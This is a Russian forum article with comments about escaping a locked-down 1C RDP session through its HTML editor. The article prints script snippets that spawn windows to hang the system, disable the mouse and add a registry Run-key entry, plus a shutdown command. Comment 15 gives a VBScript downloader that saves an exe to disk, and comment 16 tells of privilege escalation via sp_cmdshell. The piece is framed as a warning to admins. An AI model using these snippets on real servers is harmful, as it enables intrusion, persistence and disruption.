bdd2

Взлом сервера с помощью 1С:Предприятие 8.1

Опубликовал Олег Пономаренко (O-Planet) в раздел Администрирование - Системное

Взлом - это углубленное изучение (с)

Работал с клиентом по rdp. Ночью, конечно же. Как это обычно бывает у фрилансера: кидают на мыло вопросы, дают логин и пароль - сиди, разбирайся до утра, почему что-то не проводится, проводится не так, не попадает в нужный отчет... 

Все бы было хорошо, но в этот раз второпях выделили мне не того пользователя, не с правами администратора, а с правами какого-то удаленного оператора, и передо мной открылся по максимуму урезанный интерфейс «восьмерки», без возможности смены. Свертываю 1С – вижу абсолютно пустой рабочий стол, даже кнопка «Пуск» отсутствует. Сразу видно, сисадмин постарался, чтобы этот самый «удаленный оператор» не лез куда ему не нужно, не смотрел, что не нужно, и кроме пары рабочих документов в 1С ничего не мог открыть. Но мне-то нужно! Нужен конфигуратор, например. Даже – не конфигуратор: достаточно «прощупать» базу собственным отчетом, который бы выводил то, что мне нужно, в табло. Но вот вопрос: как его забросить на компьютер, где сделано все возможное, чтобы этого не допустить? 

Все гениальное возникает на стыке технологий. Впрочем, и абсудное тоже. Интуитивно тыкаю кнопку «Файл» в меню 1С – единственное место на экране, где хоть что-то есть. Вижу пункт «Новый», вижу в списке среди прочего html-документ… 

Решил попробовать: вдруг разработчики 1С таки оставили возможность «пошалить». Перехожу к закладке «Текст», стираю всю сгенерированную там муть, и пишу простенький код:

<html><head>
<script language=javascript>
alert("Hello, world");
</script>
</head><body></body></html>

Затаив дыхание, щелкаю по просмотру… На экране появляется веселое окошечко с приветливым заголовком Microsoft Internet Explorer. Ну надо же! А я и не надеялся… 

Ну чем Explorer с включенными скриптами - не лазейка на закрытый компьютер через rdp? При желании, я его теперь даже отформатирую удаленно!

Но форматировать пока рано: нужно закинуть туда всего лишь свой отчетик. Для этого использую мой любимый файлообменник, а в открытом для смелых идей компоновщике web страниц вместо жизнерадостного алерта с «хелловорлдом» пишу более претенциозное: document.location=”http://www.webfile.ru”; Жму просмотр, забираю скинутый только что свой отчет, сохраняю на рабочем столе для разнообразия. Не люблю пустующих рабочих столов… ;)

К счастью, в интерфейсе удаленного оператора работа с внешними отчетами была не закрытой, и я скоро вывожу в табло те данные по регистрам, которые меня интересуют, а параллельно работает изощренная фантазия... 

Что мешает таким же образом, через файлообменник кинуть на удаленный, закрытый от всего (почти от всего) компьютер, скажем, Total Comander, настроить в нем ftp, найти их базу и выгрузить куда-нибудь? Дома-то работать сподручнее! Конечно, только если это – сервер. А если не сервер, то значит, там есть сеть, а в сети тоже можно найти что-нибудь интересное… 

Впрочем, вместо тотала можно забросить и что-то более веселенькое, да все, что угодно! Забросить и запустить прямо с рабочего стола, например, собственную программу, работающую с реестром… А можно и не с рабочего стола, а прямо из эксплорера, благо, он сам дает возможность не оставлять следов, когда спрашивает по поводу exe-файла, сохранить его, или запустить… Ну чем не взлом?

Кульминацией всего было то, что я вспомнил про свою переписку когда-то с одним хаккером, и про его восхищенные излияния про возможность использования в эксплорере разных ole-объектов, например, вот этот: ActiveXObject("Scripting.FileSystemObject"); Зачем, спрашивается, коммандер, когда есть такое…

Кстати, очень легко можно было бы этот комп завесить, если бы на то подвернулся повод. Как, спрашивается, проще всего завесить Windows – если не созданием этих самых windows? Для этого, в полюбившемся нам компоновщике меняем вторично содержимое нашего скрипта, и вместо window.location ставим:

for(var k=0; k<10000; k++)
  window.open("about:blank");

Попробуйте у себя ради прикола, конечно, снизив число в цикле хотя бы до 5… 

Но поговорим еще о скриптах. Поскольку могучий Эксплорер поддерживает и WBScript, то ни что не мешает отправить сервак на перезагрузку, если незадачливый работодатель сделал вас всего лишь удаленным оператором. Понятно, что такая процедура – весьма не желательна в разгар рабочего дня, когда на сервере висит куча других удаленных операторов и не только…

ExitWindows, может, в XP и не сработает, а вот rundll32 krnl386.exe,exitkernel должен :)

Но не будет столь экстримичны, для начала, ограничимся запретом мыши на сервере:

<script language="vbscript">
<!--
Set Shell=CreateObject("WScript.Shell") 
Shell.Run("rundll32 mouse,disable")
-->
</script>

А если вы - приверженец старой школы, и считаете мышь вообще вредной ошибкой в истории компьютеров, то запретите ее навечно, прописав это в реестр с помощью того же VB!  

WshShell.RegWrite"HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunServicesMad", "rundll32 mouse,disable"

Конечно, делать я ничего такого не стал, а клиенту утром сообщил, что их сисадмину стоит серьезно обеспокоиться. Собственно, и сюда публикую только для того, чтобы коллеги, занимающиеся администрированием серверов 1С, учли подобную лазейку и предприняли необходимые меры. 

См. также

Добавить вознаграждение
Комментарии
1. Igоr Sаulеviсh (gutentag) 249 05.02.09 00:50 Сейчас в теме
...я как бухгалтер ничего не понял, но покажу статью на работе программерам, может что втолкуют в меня :)
2. Sheyko (Sheyko) 48 05.02.09 01:40 Сейчас в теме
расказ про частный случай не настроенного сервера

//в интерфейсе удаленного оператора работа с внешними отчетами была не закрытой
кто-же такую дыру оставляет
//я скоро вывожу в табло те данные по регистрам, которые меня интересуют
про РЛС и права на регистры тоже никто не слышал
//Total Comander, настроить в нем ftp, найти их базу и выгрузить куда-нибудь
база может лежать и не на этом компе. в случае терминал=сервер права win-пользователя на каталог с базой должны спасать
3. Олег Пономаренко (O-Planet) 6635 05.02.09 01:54 Сейчас в теме
// кто-же такую дыру оставляет
А если по работе требуется?
// база может лежать и не на этом компе
Ну да. Я и пину "если"

А вообще, все правильно: если настраивать все путем, то, думаю, не пройдет. Просто тут ситуация интересная: без 1С все было настроено путем. 1С вносит свои коррективы, собственно, на это и хотел обратить внимание.
4. Сhe Burashka (CheBurator) 05.02.09 02:59 Сейчас в теме
Не увидел в статье упоминания про far и шпи...
5. Артур Аюханов (artbear) 840 05.02.09 06:57 Сейчас в теме
(0) Если у твоего удаленного оператора нет прав админа, ты нифига не сможешь прописать в системный реестр, HKLM и т.д.
Открытием кучи окон IE ты также завесишь, как правило, только текущий сеанс, хотя, конечно, расход памяти на сервере будет огромный :)
Хотя 2000 народ умудрялся почти подвешивать, открывая огроменные отчеты из 77 за несколько лет :)

Мышку заморозишь ты только для текущего сеанса, который любой админ может удаленно или через тот же терминал завершить.
Форматировать без админских прав ты также не сможешь.
Перезагрузить можешь также только при наличии прав.

Доступ к инету также спокойно обламывается с помощью нормального файервола, настроенного на разграничение не по компам, а по именам пользователей. Да и доступ с основного сервера в инет - это очень плохо :)

И что у нас в итоге остается :) ?
Spartan; annak2980; forevil; smit1c; hulio; MrDen; lustin; sasha_r; Gamm; German; JohnyDeath; Shurik; +12 Ответить 1
6. Андрей Скляров (coder1cv8) 3263 05.02.09 08:09 Сейчас в теме
(0) Почувствовал себя хакером? ) Нда...
hulio; sasha_r; +2 Ответить 1
7. Сандро (Shurik) 102 05.02.09 08:35 Сейчас в теме
Это все косяки и/или лень админа.
8. Олег Пономаренко (O-Planet) 6635 05.02.09 11:22 Сейчас в теме
(4) Far и есть главный шпингалет

(5) Смыс - не в том, что я чего-то не могу, а в том, что имеется возможность покопаться на компе. Например, я, ища место, куда бы сбросить свой отчет, наткнулся на диск D того компа, на котором были папки Клиенты. Я не присматривался особо, но отметил, что в этой папке лежит куча инфы, которкю, предполагалось, не должен видеть удаленный оператор. Тем более, не должен иметь возможности удалять. Вообще, если тему развивать, то можно вспомнить, что имеются способы перестройки прав юзеров в Windows, и вообще, самое большое зло - от кнопки F8

(6) Хаккером я себя чувствовал лишь однажды, когда начальство (я не всегда был фри) поставило задачу сломать до конца недели защиту на одном САПРе для ЧПУ от Siemens, потому что слишком дорогой он был... ;)

(7) Ага. О том - и речь.
9. Максим Костюкевич (MaxiSoft) 58 05.02.09 11:22 Сейчас в теме
вот пока не совсем понял для чего такой извращенный способ для того чтобы просто открыть удаленный отчет или обработку! Ведь если есть права для получения данных из интернета достаточно просто нажать кнопку "Открыть" и в строке имя файла набрать "http://server_id/tools_id.epf" и все 1с спокойненько запустит данную обработку или отчет! Ну а дальше только фантазия и возможности языка 1С.
10. vip (vip) 05.02.09 12:06 Сейчас в теме
(8) > Far и есть главный шпингалет
Не. Не главный.
11. mrden (MrDen) 07.02.09 00:03 Сейчас в теме
А если доступ по RDP не дали то тогда как?
12. Олег Пономаренко (O-Planet) 6635 07.02.09 04:25 Сейчас в теме
13. Сергей Дудаков (Anything) 79 07.02.09 12:06 Сейчас в теме
Если есть меню "Файл" -> "Открыть..." и доступ к жесткому диску, можно запустить любую программу.

Для этого в окне выбора кликаем на ней правой кнопкой и выбраем пункт "Открыть". Программа и запустится.

Например, можно было попробовать залезть в папку Windows и запустить Explorer.exe. Возможно, и кнопка "Пуск" появилсь бы...
14. Аркадий Кучер (Abadonna) 3648 07.02.09 12:19 Сейчас в теме
(8)>Far и есть главный шпингалет
Да уж! Я лучше "Кассирочку" куплю, чем этого долбанного фара юзать буду ;)
defini; DMSDeveloper; O-Planet; +3 1 Ответить 1
15. Сергей Сытько (8SiriuS8) 114 07.02.09 13:13 Сейчас в теме
А еще можно на RDP залить файло следующим скриптом... vbs

Set oXMLHTTP = CreateObject("MSXML2.XMLHTTP")
oXMLHTTP.Open "GET", "http://ссылка на файл ", 0 'адрес где лежит файл
oXMLHTTP.Send
Set oADOStream = CreateObject("ADODB.Stream")
oADOStream.Mode = 3
oADOStream.Type = 1
oADOStream.Open
oADOStream.Write oXMLHTTP.responseBody
oADOStream.SaveToFile "C:\file.exe", 2 'куда файл сохранять

и чтоб от такого скрипта зашититься сисадмину крепко репу почесать надо будет...
O-Planet; +1 Ответить
16. Sasha_H (logarifm) 07.02.09 14:50 Сейчас в теме
У меня аналогично был случай только там 1С 7.7 и был доступ к конфигуратору. Но я не мог закачать файл им на сервер так как ИЕ зарезали доступ, а зайти и поменят не могу доменное правило. Блин... Дамаю... Но быстро припоминаю одну ХП в скл. sp_cmdshell, но сходу встретлся с проблемой необходимо узнать пароль sa на sql сервер. Ну благо то, что есть обработки в инете, я быстренько нашел взлом пароля sa из 1С. Буфер обмена работал это тоже благо я быстренько ее через буфер перегнал и запуск. Пароль узнал... А далее, все дело техники! Захожу в СКЛ но опа, админ постарался и прикрыл эту системную хранимку, еще чуток пошарив в инете я нашел команды как ее открыть, открыл эту хранимку и опля уже имею доступ к коммандной строке да еще из правами администратора. Хех жаль только , что локального админа, я быстренько с помощью команды создаю локального админа и на ура вхожу под локальным админом! Все закачую все что нужно... У меня не было за правило взломать, а сделать )) Вот собственно мой опыт по взлому.
17. Drock (d.snissarenko) 07.02.09 17:56 Сейчас в теме
Извините..., но этому бояну уже лет, столько сколько rdp, настоящий бы админ, залочил бы контекстное меню проводника, скрыл диски, запретил гуляние по дискам, только своя папка, запретил открытие ослика. Поэтому к взлому это никакого отношения не имеет, тем паче в системе от обратного (все разрешено, ничего не запрещено). Попробуйте в лине по удаленке с правами юзера ченить замутить :) .
18. Drock (d.snissarenko) 07.02.09 17:58 Сейчас в теме
в этом плане групповые политики рулят
19. Roman (1cHyb) 08.02.09 00:07 Сейчас в теме
ИМХО лучше бы работал, а не хнёй занимался! =)
smit1c; sasha_r; +2 Ответить
20. Максим Сухов (MaxS) 203 08.02.09 07:53 Сейчас в теме
В 1С жмем Файл - Открыть, на любой папке контекстным меню Открыть и попадаем в Windows проводник, ищём исполняемый файл и запускаем.
Пока этих возможностей хватает не прибегая к другим более изощрённым. ;)
21. Дмитрий Воробьев (vde69) 863 08.02.09 10:32 Сейчас в теме
а учитывая, что сервер 1с работает под правами локального админа (а часто его ставчт под правами доменного), то кинув простенький скрипт в привелигерованый модуль можно ломать сервер, а от туда вообще все :)

в (0) админ защищал не то :)))
22. gilv (Gilev.Vyacheslav) 08.02.09 14:44 Сейчас в теме
(0) так понимаю начитавшись тинейджеровкого хакер.ру автора понесло :)))
23. fantasy2 (fantasy2) 08.02.09 14:54 Сейчас в теме
Простой способ:
в терминале жмём
Ctrl+Alt+End - открвается Диспечер задач
Файл - Новая Задача - "explorer" - Аля Windows !!!..
или в 1С
Файл - Открыть - Окно выбора файла
выбираем любую папку -на ней правцю кнопку мыши - Проводник
- Аля Windows !!!..
24. Сергей (seermak) 653 08.02.09 15:04 Сейчас в теме
Я представил, сколько прочитавших все вышеизложенное будут пытаться подломить центральный сервер своей конторы(просто ради интереса , на будущее - пытливые умы).Дайте им еще несколько действительно действенных советов! ;))
25. Аркадий Кучер (Abadonna) 3648 08.02.09 15:36 Сейчас в теме
(23)>или в 1С Файл - Открыть - Окно выбора файла
Ювыбираем любую папку -на ней правцю кнопку мыши - Проводник
А зачем так сложно? В окне выбора баз жмем кнопку "изменить", а там правую - Проводник.
Олежа "изобрел" всем известный способ, но по- русски: как те отолярингологи
26. Олег Пономаренко (O-Planet) 6635 08.02.09 19:02 Сейчас в теме
(23) (25) Нет, не пройдет. В моем случае админ сделал что-то, что по трем клавишам ничего не происходило. Я это проверил прежде всего. В (21) правильно написано, что админ защищал не то. Т.е., если туда зайти без 1С, то можно только смотреть на пустой рабочий стол. Собственно, я и хотел донести эту мысль, что если стоит 1С, то сервер нужно защищать несколько в ином ключе.
(22) Надо же, какие сайты ты знаешь. Тож надо глянуть ))
27. gilv (Gilev.Vyacheslav) 08.02.09 21:21 Сейчас в теме
(26) ты бы почитал http://kb.1c.ru/articleView.jsp?id=37 (конешь понимаю, что проще велосипед изобретать, чем читать чужое)
29. Олег Пономаренко (O-Planet) 6635 08.02.09 23:48 Сейчас в теме
(28) Как раз, 1С. Потому что доступа по rdp ни к чему другому фирмам не требуется, а 1С по rdp сопровождается везде. Я постоянно делаю что-то удаленно, и ни разу не видел, чтобы админы учитывали возможность из 1С копаться в их компьютере. Возможно, многие сисадмины просто достаточно смутно представляют, что такое, 1С. Вот для таких и написал.
30. Дуб (Дуб) 69 09.02.09 08:27 Сейчас в теме
(0) Вообще-то, права на сервер определяются не "дырками" 1С, а степенью криворукости админа. Если каждому встречному-поперечному оставлены полные полномочия - рано или поздно такая система может упасть. Вопрос времени и интереса со стороны доброжелателей.
А так, в целом, насколько помню, доступ через html уже был описан ранее.
Другое дело, если автор додумался сам - то, конечно, молодец. Но описанного ранее этого не отменяет.
32. Sasha R. (sasha_r) 09.02.09 12:20 Сейчас в теме
тут, я смотрю, та же бодяга что и на клерк.ру

статья не про взлом сервера при помащи 1с, а про кривые руки недальновидного админа этого сервака и про ненастроенные политики безопастности :(

аффтар, похоже, желает себе дешевой популярности. ну-ну
33. Дуб (Дуб) 69 09.02.09 12:29 Сейчас в теме
Хватит автора клевать. Если он сам нашёл этот путь действия - это очень хорошо его характеризует. Не суть важно, что ко "взлому" это не относится.
DMSDeveloper; sasha_r; +2 Ответить 1
34. Sasha R. (sasha_r) 09.02.09 12:30 Сейчас в теме
2Дуб: ну так назвал бы статью "как я нашел дыру в сервере", а не "взлом сервера при помощи 1С". Разница есть, кмк - причем довольно ощутимая :)
35. Артур Аюханов (artbear) 840 09.02.09 13:35 Сейчас в теме
ОФФ.
(14) Ставлю минус за "долбанный фар" :(
ЗЫ обещал себе не минусовать комменты, но "долбанный фар" достоин минуса, и не одного.
Я, наоборот, ТК не люблю с давних пор, а Фар обожаю за скорость :)
36. Олег Пономаренко (O-Planet) 6635 09.02.09 13:54 Сейчас в теме
(33) Люблю js, потому и нашел легко способ его применить. Назвал "взлом", чтобы привлечь внимание админов к теме, только и всего.
37. Аркадий Кучер (Abadonna) 3648 09.02.09 14:09 Сейчас в теме
(35) Ставлю минус "за ТК не люблю с давних пор".
Квиты ;)
Минус в уме так же vip_у, Чебурашке и прочим "подфарникам" :)))
38. Аркадий Кучер (Abadonna) 3648 09.02.09 14:11 Сейчас в теме
(37) Кстати, заметь, написать - написал, но минус ставить не стал ;)
"Фар обожаю за скорость"
И куда вы всё торопитесь?
39. Олег Пономаренко (O-Planet) 6635 09.02.09 14:17 Сейчас в теме
(38) Они - болящие :) Far - это ублюдочный NC
defini; vasilykushnir; Abadonna; +3 3 Ответить 1
40. Артур Аюханов (artbear) 840 09.02.09 14:32 Сейчас в теме
(39) Также минус :)
Нортон в свое время был палочкой-выручалочкой для многих вещей.
ЗЫ ну и чтобы плюс уравновесить :)
MarSeN; markers; +2 Ответить 1
41. Василий Демидов (Душелов) 3764 09.02.09 14:33 Сейчас в теме
Дос навигатор - наше все! :)
markers; Dimasik2007; vasilykushnir; +3 Ответить 1
42. Артур Аюханов (artbear) 840 09.02.09 14:35 Сейчас в теме
(38) Ну типа хочется же использовать всю мощь компьютера, а не быть белым человека из старой поговорки индейцев апачи - "Белый человек - это тот, кто сидит перед стеклянным экраном и смотрит на песочные часы" :)

ЗЫ Еще с Вин 3 ненавижу эти часики :)
43. Аркадий Кучер (Abadonna) 3648 09.02.09 14:39 Сейчас в теме
У тотала есть одно супер-преимущество - для него есть МОЙ ПЛАГИН, полноценный, а не та жалкая поделка, что под фар идет :)))
44. Олег Пономаренко (O-Planet) 6635 09.02.09 14:47 Сейчас в теме
А кто-нить "Фрегат" юзал? :) Могу любитенлям фара порекомендовать wd вместо Word, кто помнит такой текстовый редактор. Кстати, очень хороший для 286. А вообще, стоит on-line игруху создавать уже на тему тотальных войн, т.е. истребления культа фаропоклонников доблестными рыцарями TC :)
45. Василий Демидов (Душелов) 3764 09.02.09 14:48 Сейчас в теме
Я смотрю, тут у нас никто не пользуется командной строкой... Ну-ну :)
MegaMouse; MrDen; artbear; +3 Ответить 2
46. Vasily Kushnir (vasilykushnir) 62 09.02.09 15:03 Сейчас в теме
(40) Тогда минус уравновешиваю. :-)))
(41) А вот эту штукойовину я любил - из толпы VC NC FAR очень выгодно выделялся. Прав Планет - новые времена диктуют новую моду: кто бы что ни говорил, но время ДОС-ориентированных менеджеров благополучно уходят. Не хочу их напрасно хулить - для каждого овоща свой сезон. Так что можно много чего доказывать, но каждый сходит с ума по-своему: у кого вилка в левой руке, а у кого котлета в правой...
47. Альтаир (Altair777) 633 09.02.09 15:10 Сейчас в теме
(44) Все что угодно, только не Фрегат! :-)

Мало нам браузерных войн, вы еще и файл-менеджерную устроили.
Может, на форуме раздел сделать "Самое лучшее ПО в различных категориях"?
И там сражаться :-)
48. Артур Аюханов (artbear) 840 09.02.09 15:15 Сейчас в теме
(45) Ага, про ком.строку верно замечено :)
49. Vasily Kushnir (vasilykushnir) 62 09.02.09 15:18 Сейчас в теме
(45), (48) Ага... А потом спрашивают, что такое bat- файл и с чем его жрут, извиняюсь - кушают....
Кстати, на той технике что работал до виндов коммандные файлы имели расширение сом (представляете как поначалу путался?).
50. (das) Афанасьева Светлана (das) 233 09.02.09 15:47 Сейчас в теме
Тема "Защиты серверов и т.д.", которую затронул O-Planet, актуальна для многих. Я с удовольствием прочитала и статью, и комментарии. И, ведь, совсем неважно какое ПО использовать (это я к нашим ГУРУ обращаюсь). Не у всех конечных пользователей настроена система защиты информации должным образом.
Поэтому, искренне считаю данную тему актуальной для многих... Поэтому (+)
vasilykushnir; +1 Ответить 3
51. Vasily Kushnir (vasilykushnir) 62 09.02.09 15:55 Сейчас в теме
52. Альтаир (Altair777) 633 09.02.09 16:33 Сейчас в теме
(50) Если бы автор еще рассказал как правильно настроить политики безопасности, то и я бы плюсик поставил.
Или хотя бы в шапке дыл ссылочки на статьи, рассказывающие об этом.
А то получается, что озвучена только проблема.
53. Vasily Kushnir (vasilykushnir) 62 09.02.09 16:50 Сейчас в теме
(52) А если автор не сисадмин? Он обозначил проблему - остальные пусть на ус мотают. У меня к примеру эта проблема так остро не стоит - парочка физических внушений ретивым юзерам мужского полу и порция сквернословия юзерам женского полу - и все решилось полюбовно: они не нарушают - я не наказываю.
54. Vasily Kushnir (vasilykushnir) 62 09.02.09 16:50 Сейчас в теме
55. Альтаир (Altair777) 633 09.02.09 17:18 Сейчас в теме
(53) Хорошо, может я сам немножко разгребусь и напишу :-)

И, кстати, при чем тут 1С 8.1? Из под 7-ки точно также ломается.
56. Олег Пономаренко (O-Planet) 6635 09.02.09 20:37 Сейчас в теме
(55) 7.7 не имеет встроенного эксплорера с загибоном на макетирование по кнопке "Файл" =)
57. Альтаир (Altair777) 633 09.02.09 20:40 Сейчас в теме
(56) 7.7 имеет возможность создать файл при открытии через правую кнопочку серого грузына. Хотя не факт, что серого :-)
58. Drock (d.snissarenko) 10.02.09 21:57 Сейчас в теме
http://citrix.pp.ru/forum/viewtopic.php?t=3426&highlight=Explorer

не деритесь девочки ))) - я эту тему 3 год назад запалил у себя, у меня тогда домена даж не было еще, а о групповых политиках я имел смутнейшее представление, а заходили в базу клиенты, которые удаленно заявки клепали себе.
59. Альтаир (Altair777) 633 11.02.09 00:02 Сейчас в теме
(58) > не деритесь девочки )))

это ты кому? нам тут своих хватает флеймистов, так еще и с Мисты пожаловали :-)
http://www.forum.mista.ru/users.php?id=17850
60. Сhe Burashka (CheBurator) 11.02.09 00:49 Сейчас в теме
На старой работе поднял домен и путем раздал всякие права и ограничения по группам, подразделениям, и т.д. вплоть до принудительной установки корпортаивных обоев и ограничений на запуск приложений - после этого ввод нового юзера заключался во включении его в нужные группы. все. работало года полтора. После ухода и сдачи дел - ОТСОСЕРЫ переставили домен и накатили политики "по умолчанию" - т.е. тупо поставили сервак... На вопрос - а зачем? ответ был простой: у вас там очень сложно было сделано... что сказать - ОТСОСЕРЫ...
Анекдот в тему:
идет операция, хирург, ассистенты и пр.
- Сестра, скальпель!
- Сестра, томпон!
- Сестра, отсос!
- сестра! ОТСТОС - это инструмент!
61. Drock (d.snissarenko) 11.02.09 07:10 Сейчас в теме
(59) так для проформы зайди тут в мой профайл и погляди когда я тут зареган :) и когда ты.
62. Альтаир (Altair777) 633 11.02.09 09:05 Сейчас в теме
Это я видел, ну и что?
А ты так просто зайди в http://infostart.ru/community/people/ и посмотри где я, а где ты?
И рейтинги можешь посмотреть: мой +189, твой +78.
P.S. Кстати, тебе большой минус, что ты на 2 года и почти 3 месяца раньше меня зареган и такой отсталый :-)
63. Drock (d.snissarenko) 11.02.09 10:17 Сейчас в теме
Ну вот и начали меряцо :) , 1с не мой профиль, это хобби :))
64. Альтаир (Altair777) 633 11.02.09 10:35 Сейчас в теме
(63) ты сам начал меряться

58. Drock 10.02.2009 21:02:24
не деритесь девочки )))

поэтому я тебе и сказал
65. Drock (d.snissarenko) 11.02.09 14:41 Сейчас в теме
Это я сказал к тому, что флейма не по делу развели аж на 3 страницы коментов, если серьезно подходить к вопросу, то нормальный админ политиками так может кастрировать винду, что не один один/неодинэсник ее не разлочит, а то, что у людей разгильдяйство это другой вопрос, меня этот вопрос озадачил, как я ваял выше, в связи с тем, что 1с по удаленке юзали покупатели.
66. Drock (d.snissarenko) 11.02.09 14:42 Сейчас в теме
67. Drock (d.snissarenko) 11.02.09 14:43 Сейчас в теме
вот если бы он тему обозвал взлом сервера с помощью SAMinside :), без прав и доступа к cmd, было бы интересно...
68. Олег Пономаренко (O-Planet) 6635 11.02.09 14:48 Сейчас в теме
69. Альтаир (Altair777) 633 11.02.09 14:49 Сейчас в теме
(65) Какого флейма? И кто? Лично я?
А вот лично ты развел. Го на Мисту! :-)
70. Drock (d.snissarenko) 11.02.09 19:49 Сейчас в теме
Я не я и лошадь не моя [мама мама. меня обижаюююють...]....
Прежде чем кого-то, куда-то посылать, прочти внимательно первые 3 страницы комментариев и поймешь откуда уши выросли в моем первом посте к данной статье.
Так что вопрос флейма считаю закрытым....
Свое мнение к вопросу я высказал в своем первом посте, если хочешь поговорить о флейме или померятся еще чем-то, то милости прошу в личку.

PS// о замерах...
... я считаю, свой рейтинг не по плюсам за комментарии, а по плюсам за статьи и программы, так что твои 189 ниочем отминусуй соточку
71. Альтаир (Altair777) 633 11.02.09 19:58 Сейчас в теме
(70) Я-то прочитал, а если бы и ты это сделал, то увидел бы мои комменты по этому поводу.
Вопрос флейма и я буду считать закрытым, когда ты перестанешь троллить.

А по поводу рейтинга за программы: у меня 57, у тебя 28 :-)

А статьи твои были написаны за царя Панька (кроме последней) и потеряли свою актуальность. Кстати, а твои программы еще древнее.

По поводу лички. Обозвал ты меня и 0-Планета девочками (а возможно и остальных участников обсуждения) в открытую, так что и ответ ты получил в том же виде.
72. Drock (d.snissarenko) 11.02.09 20:28 Сейчас в теме
Ахтыбожемой, да успокойся ты уже, как дите малое повелся
73. Drock (d.snissarenko) 11.02.09 20:32 Сейчас в теме
Заметь, статья из популярных не падает. О-планету таки хорошо...
74. Альтаир (Altair777) 633 11.02.09 20:58 Сейчас в теме
(72) Сюсюкаться ты со своими детками будешь.
(73) мда... долго тебя не было на ИС.
75. Drock (d.snissarenko) 12.02.09 06:55 Сейчас в теме
(74) "Не будешь" - а уже .
Какие-то проблемы с моим возвращением?
76. Аркадий Кучер (Abadonna) 3648 12.02.09 07:24 Сейчас в теме
(64) Т.к. в фразе "не деритесь девочки )))" не стоит положенная по всем правилам русского языка запятая, фраза обращением считаться не может ;)
Так что зря ты к ней "цепанулся"
77. Альтаир (Altair777) 633 12.02.09 08:59 Сейчас в теме
(76) запятая не стоит просто от безграмотности или от торопливости написать гадость.
Кстати, Аркадий, фиксин по этому поводу написал бы "буквоедство детектед" :-)
78. Drock (d.snissarenko) 12.02.09 10:06 Сейчас в теме
автор поставил тире :), а о безграмотности и бездуховности автора не тебе судить, поэтому автор предложил тебе все пожелания писать в личку, либо заведи с автором дискуссию на эту тему на форуме, в разделе курилка.
Если ты это принял близко к сердцу, то это твои проблемы, за отсутствие чувства юмора автор ответственности не несет.
79. Олег Пономаренко (O-Planet) 6635 12.02.09 17:36 Сейчас в теме
И кто-то еще Фиксина обвинял во флуде и неконструктивизме. Фиксин - падаван по сравнению с отдельными джедаями флуда :(
80. Альтаир (Altair777) 633 12.02.09 17:46 Сейчас в теме
Прежде чем говорить о том, что кто-то флудит, не мешало бы узнать значение этого слова. Если не учитывать, что слово иногда «флуд» используется как синоним слова «флейм», то лично я не флудил.
Да и не флеймил, кажется.
81. Альтаир (Altair777) 633 12.02.09 17:50 Сейчас в теме
А если кто-то считает нормальным, когда его (именно "его", а не "ее") называют девочкой..... - идите в аську или в личку, имхо.
82. Сhe Burashka (CheBurator) 12.02.09 18:22 Сейчас в теме
Але, горячие финские парни Альтаир и Дрок! спокойнее!!! спокойнее!!! Не доросли вы еще пиписьками меряться!!! ;-)
83. Альтаир (Altair777) 633 12.02.09 19:01 Сейчас в теме
(82) Может я и не дорос, зато пиписька доросла. Имхо... :-)

P.S. Если Дрок(гыгыгы (с)фиксин) писать сюда больше не будет, то и я не буду.
P.P.S. Я просил одного из Админов удалить отсюда все комментарии, начиная с 58.
84. Сhe Burashka (CheBurator) 12.02.09 19:12 Сейчас в теме
(83) ты это.. осторожнее - а то пиписька перевесит, упадешь, лицо разобьешь...
;-)
..у админов политика - ничего не удалять...
85. Олег Пономаренко (O-Planet) 6635 12.02.09 19:27 Сейчас в теме
(80) Да мне по бубну флейм или флуд! Но я вижу во многих топиках десятки твоих неконструктивных комментариев, разные придирки к людям не по делу, как сейчас здесь, разборки, кто плохой. А потом просьбы админам снести пол топика флудофлейма. По теме, если не понимаешь шутливого обращения, приемлемого на профессиональных форумах между коллегами, то это действительно, только твоя проблема.
86. Василий Демидов (Душелов) 3764 12.02.09 19:29 Сейчас в теме
(85) Ладно, девочки, не ссортьесь! :))))))))))
87. Альтаир (Altair777) 633 12.02.09 19:40 Сейчас в теме
(85) зато ты нифика не делаешь как модератор.
А используешь свои права в корыстных целях. Когда это тебе выгодно.
Шутить я позволяю. Друзьям. А не известно кому неизвестно из какого небытия вылезшим.
Да и мне по бубну. Что этот срач (с подачи Дрока), поднялся именно здесь.
Так как статейка ниочем. О тупом админе, который не умеет использовать политики безопасности.

P.S. Я хотел прекратить (см 83). Но мне не дали.
P.P.S. (85) я мог бы еще детальнее разобрать, но не вижу смысла.
88. Олег Пономаренко (O-Planet) 6635 12.02.09 19:47 Сейчас в теме
(87) А ты спросил, есть ли у модераторов возможность чистить здесь сообщения? Очень бы оно не помешало. Статью можешь считать ниачем.
89. Сергей Лунев (luns) 12.02.09 19:51 Сейчас в теме
Жили-были старик со старухой. Детей у них не было. Живут - как кошка с собакой: не то что каждый день, а что ни час, то и пыль до потолка. Он ей слово, она ему - десять. Он ей двадцать, она - сто! Уж и забыли, как добрые слова говорятся, все криком да с бранью. Как-то старуха пожаловалась соседям:
- Худо живем! Я ему слово - он мне десять! Я ему двадцать, он мне - сто! Чуть не до драки - не то что каждый день, а и каждый час, покуда вместе...
Ей и присоветовали:
- Сходи в соседнюю деревню, там старик есть мудрый, знахарь, он поможет!

Пошла старуха. Пришла, обсказала. Старый тот знахарь взял склянку, налил в нее воды, пошептал над ней и подает бабке:
- На! Как только старик твой неладно скажет, ты хлебни воды из склянки-то да со святой молитвой и держи во рту. Не сплюнь и не сглотни! Держи, пока не замолчит путем. И уж тогда - сглотни. Помни!

Только пришла старуха домой, ее старик - тоже на порог. С работы он, голодный, обедать требует, а у нее не готово, проходила сколько времени... Вот и зашумел он на нее. А она - раз! - и хлебнула из склянки и молча быстренько на стол собирает уж что есть. Он ей: "Онемела, что ль?" Молчит старуха, молитву святую в уме творит. Удивился старик и тоже замолчал. Так и пошло. Чуть он зашумит, она - раз - и хлебнет из склянки... Радовалась старуха, хвалилась соседям: помог знахарь. И старик не раз говаривал: чудо, старуха-то наладилась!
annak2980; vasilykushnir; +2 Ответить
90. Альтаир (Altair777) 633 12.02.09 19:52 Сейчас в теме
(85) > Но я вижу во многих топиках десятки твоих неконструктивных комментариев, разные придирки к людям не по делу, как сейчас здесь, разборки, кто плохой

Я "придирался" к:
1) fixin - no comment
2) LenaTorpeda - забанен
3) vacancy9 - забанен
4) wictorovichvadim (примерно кажется так) - забанен
5) toypaul - еще здесь :-)
6) ukrandruha - забанен

кого-то упустил?
91. Альтаир (Altair777) 633 12.02.09 19:54 Сейчас в теме
